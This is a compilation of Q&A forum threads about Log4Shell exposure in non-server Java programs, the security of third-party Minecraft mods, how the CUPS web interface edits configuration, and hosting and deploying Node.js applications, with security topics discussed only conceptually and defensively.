Is a "program" which is not a server application affected by the log4shell vulnerability? - log4j

what I do not understand from the log4shell problems... Lets say we have a simple program which uses the log4j module.
Is this program which doesn't serve anything like a webserver or any application which serves an application to the internet/network vulnerable in any way?
Regards
Ubbu

ANY application that uses log4j2 can be vulnerable, also desktop applications, which don't serve anything to the internet as long as the executing system has a connection to the internet enabled.
Reason:
The application is vulnerable, when it logs a certain String. This could be e.g. the content of a file you open with a Java desktop application. If you are tricked to open a prepared file with a known vulnerable desktop application, just opening the file will log the String. This will load arbitrary code from the internet (almost any device is constantly connected to the internet), and executes that code on your machine.
So yes, any java application might be affected. Not limited to server applications serving web content.
IF your program has only static log messages, it is not exploitable. But almost any program logs any kind of "user" input. It's just that you not always know that you are providing a program input right now.

Obviously not. ;)
But if you have a connection to the internet later on then it would be :)

Related

Security minecraft server mods containing Java code

I am running a Java minecraft server on my Linux server. I have been asked to install some mods (e.g. data packs) on the server which appear to contain Java code written by a third party other than Mojang.
Is this Java code restricted in what it can do, or can it run any arbitrary code it likes (e.g. read /etc/passwd, open TCP ports, claim huge amounts of memory, etc.)?
In other words, how risky are minecraft mods containing Java code?
This is a very good question. I actually was wondering that too. I have spent a bit of time looking at the binaries of minecraft and the minecraft server spigot. I assume we both use the Java Edition.
First of all, the Java code, once you run it on a host, can do anything. The only mechanism that can prevent that and protect the user from the developer in Java, is the security manager. Once you turn on the security manager (which is an opt-in mechanism) you have the ability to define a set of rules that Java will obey like e.g. it will not write into directories you don't allow it too.
So the question is: is minecraft using the security manager per default. I am 99% sure it does not. No one is using the security manager because it is a pain to configure it right and things stop working every time you get it wrong (you know that an applications uses the security manager because you face problems with policy misconfiguration every now and then).
Running minecraft is made by running an exe. I would not now where to turn the security manager on even if I would like too. There is a bit of hope with the spigot server. You can install the security manager with -Djava.security.manager and input your policy with -Djava.security.policy==my.policy. But getting the policy right will be pain. I will try to look into it though when I have a free week or so.
Minecraft mods can act with the full permissions of the user running Minecraft. If you don't trust the author of a mod, then there's basically two approaches to safely use it:
Audit the source code yourself, and then compile the mod yourself so you know it matches the binary
Run Minecraft in a sandbox such as a VM, or as a heavily restricted user.

How CUPS web interface works

I'm wondering how the Common Unix Printing System "CUPS" handels the user actions and affects the configuration files, from my humble background, a webpage only can access/edit files when there is some web server and a serverside script, so how it works without installing web server?
does it work through some shell script? if yes, how that occurs?
It is not the web frontend that alters the configuration files. At least not if you compare it to the 'typical' setup: http server, scripting engine, script.
CUPS itself contains a daemon, this also acts as a minimal web server. That deamon has control over the configuration files. And it is free to accept commands from some web client it serves. So no magic here.
Turned that around you could also setup a system running a 'normal' http server with such rights that is is able to alter all system configuration files. That's all a question of how that server/daemon is setup and started. It breaks down to simple rights management. You certainly do not want to do that, though ;-)

Node server GUI frontend

Well, we all know about headless servers. Actually, probably the vast majority of servers out there are headless.
As usual (it seems), my situation asked for quite something else. Basically, the proposed architecture looks more or less like:
The app server (node.js) is situated on a physical machine physically connected to two screens.
Between this machine and the 'net there are all sorts of regular networking layers. Please keep in mind that one of the main reasons for this setup is physical portability: ie, the client gets the necessary hardware as the product. The server itself relies on CDN for static files etc.
Each monitor/screen needs to show something different, produced by the same node server.
For now this server will probably run on Windows, but given a concept (which is what my question is after), I can change the code to run on the target platform. Well, depending on my code, this could even be done automatically.
So, my actual question. Node is quite flexible in that it can be run by anything - even custom made software (C++, Delphi, even GM). Just shell_exec('node server.js') and we're off.
But the screens themselves need to be quite dynamic. So node needs to influence both screens in some way. A few options I'm considering:
A custom app which creates two resizable, featureless windows with an embedded chromium browser to be controlled by the node server somehow (how node react with these browsers?)
A custom app which, according to node CLI output, updates the two screens' UI. Since I need something flashy as the UI, this app would be created in something like GameMaker, or a similar engine.
PS: Just in case you're asking; the physical connection opposed to a network one (eg; web-based GUI frontend) is by design.
I'd just wire up the result/monitoring screens as regular HTML pages. In your Node app, create a second HTTP server (on a non-standard port, firewalled from the public) that serves up the monitoring page.
Use socket.io to to send the realtime data to the monitoring page, which can make everything look pretty. Fire it up in a full-screen instance of Chrome.
This approach completely frees you from any kind of platform dependency, and decouples the monitoring app from the server app. It leaves you the latitude to run the monitoring app on a separate box if necessary.

Nodejs on Nearlyfreespeech?

I'm looking at an existing website, deployed on an NFS server. I'd like to rewrite some portions of it to run on nodejs. As far as I can tell, nodejs isn't supported by the NFS folk, but I am constrained to using their servers.
So, is there a way to shoe-horn nodejs onto a nearlyfreespeech server? Has anyone tried this successfully?
As of 24/September/2014 NFS now support persistent processes:
Intro and overview - More power, more control, more insight, less cost
Official example - How-To: Django on NearlyFreeSpeech.NET
3rd party example - Run node.js on NearlyFreeSpeech.Net
To summarise the process described in mopsled.com's third-party example:
1) In NFS.N's admin UI, select your site's domain shortname under Sites, then change that site's "Server Type" to "Custom" instead of PHP / Apache.
2) Put your Node server code somewhere in /home/protected/
3) Create a shell script (eg run.sh) file somewhere in /home/protected/ that contains the command(s) to start your server (eg npm run start or node server.js). NFS.N will automatically run this script as a continuous process using a "Daemon", which we'll configure in the next step.
4) Select "Daemons" in your site's NFS.N admin UI, and enter your server's startup shell script path in the "command line" field. Complete the other fields as you see fit.
5) NFS.N will now ensure that your custom server process will run indefinitely. Your web server will now be available at the port your server listens at. However, NFS.N doesn't give root access for your server to communicate through the normal "low-level" internet ports (eg :80 and :443), so if you want to serve those, you must use NFS.N's "Proxy" feature described in the next step.
6) If you need to listen on low-level ports: select "Add a Proxy" in your site's NFS.N admin UI and enter the relevant settings, checking the "Bypass Apache entirely" option and giving the port your server is listening on for the "Target Port" option.
That's it! You can now stop/restart the server's continuous process (the shell script that the Daemon is maintaining) in the Daemon's configuration page.
NFS.net have a new "NFGI" architecture that may open the possibility to this:
NFGI can be made to work with other languages as well, making them first-class citizens of our service, just as fast and integrated as PHP currently is. This paves the way for making all sorts of frameworks viable that have traditionally been too slow when run through CGI. Rails. Catalyst. Django. We also believe it can be leveraged to make node.js work on our service, but we’re not 100% sure about that.
(Source: http://blog.nearlyfreespeech.net/2013/09/21/cgissh-upgrades/)
If you want this feature you can vote for it in their feature request system at https://members.nearlyfreespeech.net/support/voting
Although to be honest, I concur with earlier answers, using Node via CGI would lose some of the benefit...but would not be without its charms. Something like http://larsjung.de/node-cgi/ for NFS.net would be an interesting JavaScript replacement for PHP.
The problem is not that NFS.net will not support NodeJS. The thing is that you can't have "long running processes", i.e. servers. Since you can't run servers, you can't run Node.
In fact, the only way you can have anything dynamic there is by using CGI. There's no reason why Javascript engine could not be used to generate pages in response to requests, but I am not sure that can be done with node.

Deploying updates to production node.js code

This may be a basic question, but how do I go about effeciently deploying updates to currently running node.js code?
I'm coming from a PHP, JavaScript (client-side) background, where I can just overwrite files when they need updating and the changes are instantly available on the produciton site.
But in node.js I have to overwrite the existing files, then shut-down and the re-launch the application. Should I be worried by potential downtime in this? To me it seems like a more risky approach than the PHP (scripting) way. Unless I have a server cluster, where I can take down one server at a time for updates.
What kind of strategies are available for this?
In my case it's pretty much:
svn up; monit restart node
This Node server is acting as a comet server with long polling clients, so clients just reconnect like they normally would. The first thing the Node server does is grab the current state info from the database, so everything is running smoothly in no time.
I don't think this is really any riskier than doing an svn up to update a bunch of PHP files. If anything it's a little bit safer. When you're updating a big php project, there's a chance (if it's a high traffic site it's basically a 100% chance) that you could be getting requests over the web server while you're still updating. This means that you would be running updated and out-of-date code in the same request. At least with the Node approach, you can update everything and restart the Node server and know that all your code is up to date.
I wouldn't worry too much about downtime, you should be able to keep this so short that chances are no one will notice (kill the process and re-launch it in a bash script or something if you want to keep it to a fraction of a second).
Of more concern however is that many Node applications keep a lot of state information in memory which you're going to lose when you restart it. For example if you were running a chat application it might not remember who users were talking to or what channels/rooms they were in. Dealing with this is more of a design issue though, and very application specific.
If your node.js application 'can't skip a beat' meaning it is under continuous bombardment of incoming requests, you just simply cant afford that downtime of a quick restart (even with nodemon). I think in some cases you simply want a seamless restart of your node.js apps.
To do this I use naught: https://github.com/superjoe30/naught
Zero downtime deployment for your Node.js server using builtin cluster API
Some of the cloud hosting providers Node.js (like NodeJitsu or Windows Azure) keep both versions of your site on disk on separate directories and just redirect the traffic from one version to the new version once the new version has been fully deployed.
This is usually a built-in feature of Platform as a Service (PaaS) providers. However, if you are managing your servers you'll need to build something to allow for traffic to go from one version to the next once the new one has been fully deployed.
An advantage of this approach is that then rollbacks are easy since the previous version remains on the site intact.

Resources